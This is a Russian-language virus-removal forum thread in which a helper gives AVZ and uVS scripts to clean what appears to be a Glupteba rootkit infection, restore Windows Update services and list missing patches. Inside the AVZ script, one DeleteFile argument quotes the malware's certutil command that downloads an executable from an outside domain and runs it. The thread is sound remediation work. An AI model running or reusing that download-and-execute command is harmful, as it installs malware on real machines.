Здравствуйте. Обнаружен такой вирус KRD удалить не может. Блокирует запуск некоторых программ. Грузит процессор на 100%.
Спасите.
Спасибо.
Здравствуйте. Обнаружен такой вирус KRD удалить не может. Блокирует запуск некоторых программ. Грузит процессор на 100%.
Спасите.
Спасибо.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) akaserj, спасибо за обращение на наш форум!
Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:Компьютер перезагрузится.Код:{Исправление в службах в реестре, значения ImagePath. Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafеZone.cc При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. } var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String; DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String; ImagePathStr, RootStr, SubRootStr, LangID: string; AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer; FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String; procedure CheckAndRestoreSection(Root: String); begin Inc(AllRoots); if RegKeyExistsEx('HKLM', Root) then RegKeyResetSecurity('HKLM', Root) else begin Inc(RootsRestored); RegKeyCreate('HKLM', Root); AddToLog(RegSectMsg + Root + RestMsg); end; end; procedure CheckAndRestoreSubSection; begin CheckAndRestoreSection(SubRootStr); end; procedure RestoredMsg(Root, Param: String); begin AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg); Inc(KeysRestored); end; procedure FixedMsg(Root, Param: String); begin AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg); Inc(KeysFixed); end; procedure RestoreStrParam(Root, Param, Value: String); begin RegKeyStrParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; procedure CheckAndRestoreStrParam(Root, Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then RestoreStrParam(Root, Param, Value); end; procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then begin RegKeyIntParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; end; procedure CheckAndRestoreMultiSZParam(Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, Param) then begin ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true); RestoredMsg(RootStr, Param); end; end; // Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS' procedure ImagePathFix(Node, Srv: String); var RegStr: String; begin RegStr := 'SYSTEM\' + Node + '\Services\' + Srv; if RegKeyExistsEx('HKLM', RegStr) then begin Inc(AllKeys); RegKeyResetSecurity('HKLM', RegStr); RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr); FixedMsg(RegStr, 'ImagePath'); end; end; { Выполнение исправление всех ключей в ветках - 'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'} procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String); var FileServiceDll, CCSNumber: string; i : integer; begin if Srv = 'BITS' then FileServiceDll := FullPathSystem32 + 'qmgr.dll' else FileServiceDll := FullPathSystem32 + 'wuauserv.dll'; RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv; CheckAndRestoreSection(RootStr); CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText); CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText); CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem'); Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then RestoreStrParam(RootStr, 'ImagePath', ImagePathStr) else begin Dec(AllKeys); if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then for i:= 0 to 999 do begin if i > 0 then CCSNumber := FormatFloat('ControlSet000', i) else CCSNumber := 'CurrentControlSet'; ImagePathFix(CCSNumber, Srv); end; end; CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1); CheckAndRestoreIntParam(RootStr, 'Start', 2); CheckAndRestoreIntParam(RootStr, 'Type', 32); if Srv = 'BITS' then begin CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs'); CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ'); end; SubRootStr:= RootStr + '\Enum'; CheckAndRestoreSubSection; CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000'); CheckAndRestoreIntParam(SubRootStr, 'Count', 1); CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1); SubRootStr := RootStr + '\Security'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then begin RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00'); RestoredMsg(SubRootStr, 'Security'); end; SubRootStr:= RootStr + '\Parameters'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); RestoredMsg(SubRootStr, 'ServiceDll'); end else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); FixedMsg(SubRootStr, 'ServiceDll'); end end; { Главное выполнение } begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); SearchRootkit(true, true); SetAVZGuardStatus(True); QuarantineFileF('c:\windows\rss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', false, '', 0 ,0); QuarantineFile('C:\Windows\windefender.exe', ''); QuarantineFile('C:\Windows\System32\drivers\Winmon.sys', ''); QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys', ''); QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', ''); QuarantineFile('C:\Windows\rss\csrss.exe', ''); QuarantineFile('C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe', ''); QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\mg20201223-1.exe', ''); QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\ml20201223.exe', ''); QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\wup\xarch\wup.exe', ''); QuarantineFile('C:\Users\qwerty5\appdata\local\temp\csrss\ww31.exe', ''); DeleteFile('C:\Windows\windefender.exe', '32'); DeleteFile('C:\Windows\System32\drivers\Winmon.sys', '32'); DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys', '32'); DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '32'); DeleteFile('C:\Windows\rss\csrss.exe', '32'); DeleteFile('cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe /31340', '32'); DeleteFile('C:\Users\qwerty5\AppData\Local\Temp\csrss\scheduled.exe', '32'); DeleteFile('C:\Windows\rss\csrss.exe', ''); DeleteFile('C:\Windows\windefender.exe', ''); DeleteFile('C:\Windows\system32\Drivers\winmonfs.sys', ''); DeleteFile('C:\Windows\system32\Drivers\winmonprocessmonitor.sys', ''); DeleteFile('C:\Windows\system32\Drivers\winmon.sys', ''); DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\mg20201223-1.exe', ''); DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\ml20201223.exe', ''); DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\scheduled.exe', ''); DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\wup\xarch\wup.exe', ''); DeleteFile('C:\Users\qwerty5\appdata\local\temp\csrss\ww31.exe', ''); ClearLog; ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg'); ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg'); LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); if LangID = '0419' then begin DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.'; DispayNameTextWuauServ := 'Автоматическое обновление'; DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.'; DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)'; AddToLog('Операционная система - русская'); FinishMsg := '–––– Восстановление завершено ––––'; RestoreMsg := 'Восстановлено разделов\параметров: '; FixMsg := 'Исправлено параметров: '; CheckMsg := 'Проверено разделов\параметров: '; RegSectMsg := 'Раздел реестра HKLM\'; ParamMsg := 'Параметр '; ParamValueMsg := 'Значение параметра '; InRegSectMsg := ' в разделе реестра HKLM\'; CorrectMsg := ' исправлено на оригинальное.'; RestMsg := 'восстановлен.'; end else begin DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.'; DispayNameTextWuauServ := 'Automatic Updates'; DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.'; DispayNameTextBITS := 'Background Intelligent Transfer Service'; AddToLog('Operation system - english'); FinishMsg := '–––– Restoration finished ––––'; RestoreMsg := 'Sections\parameters restored: '; FixMsg := 'Parameters corrected: '; CheckMsg := 'Sections\parameters checked: '; RegSectMsg := 'Registry section HKLM\'; ParamMsg := 'Parameter '; ParamValueMsg := 'Value of parameter '; InRegSectMsg := ' in registry section HKLM\'; CorrectMsg := ' corrected on original.'; RestMsg := ' restored.'; end; AddToLog(''); { Определение папки X:\Windows\System32\ } NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory'); ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs'; Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1); FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\'; AllRoots := 0; AllKeys := 0; RootsRestored := 0; KeysRestored := 0; KeysFixed := 0; CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS'); CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv'); AddToLog(''); AddToLog(FinishMsg); AddToLog(''); AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored)); AddToLog(FixMsg + IntToStr(KeysFixed)); AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys)); SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log'); DeleteFileMask('c:\windows\rss', '*', true); DeleteFileMask('c:\users\qwerty5\appdata\local\temp\csrss', '*', true); DeleteSchedulerTask('csrss'); DeleteSchedulerTask('ScheduledUpdate'); DeleteDirectory('c:\windows\rss'); DeleteDirectory('c:\users\qwerty5\appdata\local\temp\csrss'); RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','WinterField', '32'); DeleteService('WinDefender'); DeleteService('Winmon'); DeleteService('WinmonFS'); DeleteService('WinmonProcessMonitor'); BC_ImportALL; ExecuteSysClean; BC_Activate; ExecuteWizard('SCU', 3, 3, true); RebootWindows(true); end.
Выполните в AVZ скрипт:
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
Сделайте новый лог Autologger, Ok после запуска нажимайте с зажатой клавишей Shift.
WBR,
Vadim
Выполнил скрипт. Не чего не изменилось
Судя по логам - изменилось. Но, если раньше лечили с KRD и без толку, заражаетесь по сети с других компьютеров.
Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.Код:O4 - MSConfig\startupfolder: C:^Users^qwerty5^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Matrix 2.0.lnk [backup] => C:\Program Files\Matrix 2.0\Matrix20.exe (2019/12/06) (file missing) O4 - MSConfig\startupreg: ABBYY_MonitoringClient [command] = C:\Users\qwerty5\AppData\Roaming\ScanClient\ScanClient_Bin\monitoring_client.exe (HKCU) (2019/12/06) (file missing)
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
WBR,
Vadim
Прикладываю файлы
Лечить этот компьютер можно до посинения, пока не устраните источники заражения. Судя по этой системе, она без критических обновлений ещё 2017-го года, которые закрыли уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами.
Обновления автоматические, скорее всего, не заработают, т. к. служба BITS выпилена частично, но нужно пробовать установить по ссылкам вручную, в первую очередь KB4012212. Попоробуем восстановить BITS, в т.ч. этим скриптом, но по хорошему нужно пролечивать все компьютеры, и не подключать к сети до завершения.------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.Код:;uVS v4.11.6 [http://dsrt.dyndns.org:8888] ;Target OS: NTv6.1 v400c OFFSGNSAVE ; C:\USERS\QWERTY5\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE bp C:\USERS\QWERTY5\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE bl 498A450754829ACC55FCA2EF4029415E 4601344 ; C:\WINDOWS\WINDEFENDER.EXE bp C:\WINDOWS\WINDEFENDER.EXE bl 6512AE7C9F36206F6433F78296102419 1987072 zoo %SystemRoot%\RSS\CSRSS.EXE addsgn 1A5EF69A5583348CF42B627DA804DE8E69AEF80148F91F7885B7E1365155B04DA7D7B719C9949E492B80F170431649FA7D524C5655DAB02CA0D3802FC70622F8 8 Trojan.MalPack.GS [Malwarebytes] 7 zoo %SystemRoot%\WINDEFENDER.EXE addsgn 9252628A3E6AC1CCE02B7A4E334BDFFACE9A6C66196A8FE80FC583345791709756104849BDBB6158F0F26927471649FA7C049D75DEC433C2D1667F3E0707F900 8 Trojan.SpyBot.795 [DrWeb] 7 zoo %Sys32%\DRIVERS\WINMON.SYS addsgn 79132211B982955C0BD4F3587B37EDFAAE75A97D65ACA138B583C5EBDB18CE0C1357C364FE6E523A1703BAB33324C2BC5D891747C9ECF02CA442E01F8706DD06 16 Win32/Rootkit.Agent.OCH [ESET-NOD32] 7 zoo %Sys32%\DRIVERS\WINMONFS.SYS addsgn 79132211B9824A720BD4F3586037EDFAAE75A97D65AB4ED9819385BCE998970C989203233A6E5C3C3E8FB5AA424609FADEDBB83255AFB7A7ECD4A07F8706D5A3 14 VirTool:WinNT/Glupteba.B [Microsoft] 7 zoo %Sys32%\DRIVERS\WINMONPROCESSMONITOR.SYS addsgn 79132211B982470D0BD4F3587B37EDFAAE75A97D65ACA1480583C5EBDB18CE7CA357C364FE6E523A1703BAB33324C2BC5D891747D95CF02CA44290AF8706DD06 24 Trojan.Rootkit.22045 [DrWeb] 7 zoo %SystemDrive%\USERS\QWERTY5\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE addsgn 1A41F69A5583348CF42B25FD40CCE5C4268AFCF6FDDE95790602C43890A23FBBE214C3573E20724C2B80849FCBB26DFA7DDFE8FFF1FEB02C2D772F2E7DF9DC8D 8 Trojan.MalPack.GS [Malwarebytes] 7 chklst delvir deldir %SystemRoot%\RSS delref %SystemDrive%\USERS\QWERTY5\DESKTOP\RESCUE2USB.EXE delref %SystemDrive%\PROGRAM FILES\ASUS\AXSP\1.01.02\ATKEXCOMSVC.EXE delref %Sys32%\DRIVERS\BSTKDRV.SYS delref %SystemDrive%\PROGRAM FILES\ELECTIONADDRESS\COMMONS-DAEMON\PRUNSRV.EXE delref %SystemDrive%\PROGRAM FILES\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.422\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.23\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\ABBYY REMOTE SCAN\DLL\SAPI.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.21.115\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.442\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.342\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.27.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.36.32\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.302\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\ABBYY REMOTE SCAN\DLL\USE55TROBJIMPL.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.17\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.34.11\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.36.52\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.35.452\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.23\GOOGLEUPDATEBROKER.EXE delref %SystemDrive%\PROGRAM FILES\GOOGLE\GOOGLETOOLBARNOTIFIER\5.10.11023.1534\SWG.DLL delref %SystemDrive%\PROGRA~1\ASUS\AXSP\101~1.02\ATKEXC~1.EXE delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL delref F:\SETUP.EXE delref D:\RTK_NIC_DRIVER_INSTALLER.SFX.EXE delref E:\AUTORUN.EXE delref %SystemDrive%\DOWNLOADS\DIABLO II + D2SE + MEDIAN XL 2012 005 + ULTIMATIVE XVI + SPINOFFS\DIABLO II + D2SE + MEDIAN XL 2012 005 + ULTIMATIVE XVI + SPINOFFS\D2SE.EXE delref %SystemDrive%\PROGRAM FILES\DXTORY SOFTWARE\DXTORY2.0\DXTORY.EXE delref %SystemDrive%\GAMES\FARM FRENZY HEAVE HO RUS\FARMFRENZY_HEAVEHO.EXE delref %SystemDrive%\PROGRAM FILES\ELTIMA SOFTWARE\FLASH DECOMPILER TRILLIX\FLASHDECOMPILER.EXE delref %SystemDrive%\GAMES\LUXOR 5\LUXOR5.EXE delref %SystemDrive%\PROGRAM FILES\LUXOR EVOLVED\LUXOR_EVOLVED.EXE delref %SystemDrive%\USERS\QWERTY5\APPDATA\ROAMING\MAIL.RU\AGENT\BIN\MAGENT.EXE delref %SystemDrive%\PROGRAM FILES\NEON WARS\GLLOADER.EXE delref %SystemDrive%\GOG GAMES\PRISON ARCHITECT\PRISON ARCHITECT.EXE delref %SystemDrive%\PROGRAM FILES\R.G. MECHANICS\SIMCITY\SIMCITY\SIMCITY.EXE delref %SystemDrive%\PROGRAM FILES\SUPER DX-BALL\DXLOADER.EXE delref %SystemDrive%\PROGRAM FILES\THE SEAL HUNTER\SEALHUNTER.EXE delref %SystemDrive%\TOTALCMD\TOTALCMD.EXE delref %SystemDrive%\USERS\QWERTY5\APPDATA\LOCAL\ALAWAR\URLRUN.EXE delref %SystemDrive%\PROGRAM FILES\ALAWAR\СОЛДАТИКИ. ЗВЕЗДНЫЙ ДЕСАНТ\TOYDEFENSE4_SCI-FI.EXE delref D:\BVBV\BLUESTACKS\CLIENT\BLUESTACKS.EXE delref %SystemDrive%\PROGRAM FILES\MATRIX 2.0\MATRIX20.EXE delref %SystemDrive%\PROGRAM FILES\MATRIX 2.0\UNINST.EXE sfc %SystemRoot%\WINDOWS\SYSTEM32\QMGR.DLL sfc %SystemRoot%\SYSWOW64\NETFXPERF.DLL sfc %SystemRoot%\SYSWOW64\MSCOREE.DLL sfc %SystemRoot%\SYSWOW64\DRPROV.DLL apply deltmp czoo restart
Компьютер перезагрузится.
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
WBR,
Vadim
Ваши права в разделе
Ответить с цитированием
